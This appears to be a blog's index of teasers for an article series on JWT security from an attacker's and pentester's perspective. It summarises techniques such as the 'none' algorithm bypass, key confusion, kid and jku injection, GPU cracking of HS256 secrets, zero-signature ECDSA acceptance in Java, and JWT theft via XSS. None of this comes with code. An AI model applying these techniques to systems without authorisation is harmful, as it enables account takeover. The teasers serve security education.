The series finale. Shor's algorithm breaks every asymmetric JWT algorithm. ML-DSA signatures at 2.4 KB don't fit in a cookie. SD-JWT for selective disclosure. Harvest Now, Decrypt Later — why migrating JWE to post-quantum cryptography is needed now.
Читать →RFC 8725 — fifteen JWT security rules from the standard's authors. For each — which attack from the series it prevents, which CVEs exist, and why ~65% of applications don't check aud. Plus three new rules from the 2026 bis update.
Читать →JWT isn't perfect — 70+ CVEs over ten years. We break down the alternatives: PASETO without the alg field, Macaroons with unique attenuation, opaque tokens with instant revocation, Google/Netflix server-side sessions. For each — what to break on a pentest.
Читать →CVE-2025-20188 (CVSS 10.0): eight characters 'notfound' in a Cisco IOS XE Lua script = root RCE on enterprise equipment. 17% of JWT CVEs in 2024-2026 are hardcoded secrets. Where to look: git history, Docker layers, JS bundles, source maps, firmware.
Читать →Leak three bits of the nonce from each ECDSA signature — and after 100 signatures you have the full private key. Minerva, TPM-FAIL, EUCLEAK: real attacks on real devices, and what's actually applicable on a web pentest right now.
Читать →Found a Reflected XSS? If the app stores JWTs in localStorage, that's not just alert(1) — it's a full takeover of every account. We cover theft from every storage type, CSP bypass via WebRTC and CSS injection, and the only defenses that actually work.
Читать →At the seams between OAuth and OIDC components, attacks emerge that don't exist in isolation: token confusion, cross-service relay, ALBeast in AWS, and DPoP bypass — with real CVEs and step-by-step pentest checks.
Читать →Which library is running on the backend determines which attacks will actually land: a ranked breakdown of the most vulnerable JWT libraries, a tier classification from recommended to dangerous, and passive fingerprinting techniques that identify the stack from the token header alone.
Читать →JWE is the encrypted side of JWT that almost nobody talks about: five parts, two encryption layers, and a full zoo of attacks - Invalid Curve on ECDH-ES, Bleichenbacher on RSA1_5, Padding Oracle on AES-CBC, PBES2 DoS with one request, and the forbidden attack on AES-GCM.
Читать →The math behind HMAC, RSA, and ECDSA from an attacker's perspective: why Sony lost the PlayStation 3 to a single repeated number, and how leaking just a few nonce bits is enough to recover a private key.
Читать →A signature of all zeros passes ECDSA verification on Java 15-18. For any message, with any key. Five lines of Python - and you're admin.
Читать →JWT contains everything for an offline attack: message and signature. Hashcat on GPU runs through 150 million HS256 per second. The secret 'secret' is cracked in 2 seconds.
Читать →The JWT header can contain a URL, and the server will go to that URL to download the key for signature verification. This isn't a bug - it's RFC 7515.
Читать →The RFC doesn't define the structure of kid. Developers use it as a file path, SQL parameter, or command argument. Each option is a separate class of vulnerability.
Читать →Take the server's public key from open access, sign a token with it - and the server accepts it. The signature exists, the signature is correct, but the token is forged.
Читать →The RFC requires every JWT library to support the none algorithm. Change one field in the header - and the server skips signature verification.
Читать →Taking a real token and dissecting it like a pathologist: header, payload, signature, Base64url, claims, edge cases.
Читать →70+ CVEs over ten years. A bug from 2015 still fires in 2026. Let's figure out why JWT stubbornly remains broken.
Читать →